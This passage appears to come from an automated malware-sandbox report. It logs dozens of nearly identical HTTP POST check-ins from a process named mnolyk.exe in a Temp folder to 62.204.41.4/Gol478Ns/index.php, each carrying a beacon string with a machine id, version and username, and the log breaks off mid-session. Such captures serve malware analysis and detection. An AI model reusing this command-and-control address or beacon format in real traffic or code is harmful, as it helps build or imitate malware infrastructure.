                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:43.154521942 CET256INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            68192.168.2.44976362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:43.325860023 CET257OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:43.390747070 CET257INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            69192.168.2.44976462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:43.558404922 CET258OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:43.624202013 CET258INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            7192.168.2.44970262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:26.146506071 CET196OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:26.210855007 CET196INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            70192.168.2.44976562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:43.792450905 CET259OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:43.858036995 CET259INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:43 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            71192.168.2.44976662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:44.075524092 CET260OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:44.143132925 CET260INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:44 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            72192.168.2.44976762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:44.322427034 CET261OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:44.386145115 CET261INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:44 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            73192.168.2.44976862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:44.560978889 CET262OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:44.625554085 CET262INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:44 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            74192.168.2.44976962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:44.792124987 CET262OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:44.854747057 CET263INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:44 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            75192.168.2.44977062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:45.036009073 CET264OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:45.101557016 CET264INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            76192.168.2.44977162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:45.279320002 CET265OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:45.342809916 CET265INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            77192.168.2.44977262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:45.513154030 CET266OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:45.578795910 CET266INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            78192.168.2.44977362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:45.744565964 CET267OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:45.808087111 CET267INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            79192.168.2.44977462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:45.979161978 CET267OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:46.045454025 CET268INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            8192.168.2.44970362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:26.386152029 CET197OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:26.450826883 CET197INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            80192.168.2.44977562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:46.222862005 CET268OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:46.288197994 CET269INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            81192.168.2.44977662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:46.462656021 CET269OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:46.525080919 CET270INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            82192.168.2.44977762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:46.698035002 CET270OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:46.761801958 CET271INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            83192.168.2.44977862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:46.936136961 CET271OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:46.998788118 CET272INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            84192.168.2.44977962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:47.176230907 CET272OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:47.242113113 CET273INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            85192.168.2.44978062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:47.419949055 CET273OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:47.485343933 CET274INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            86192.168.2.44978162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:47.651799917 CET274OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
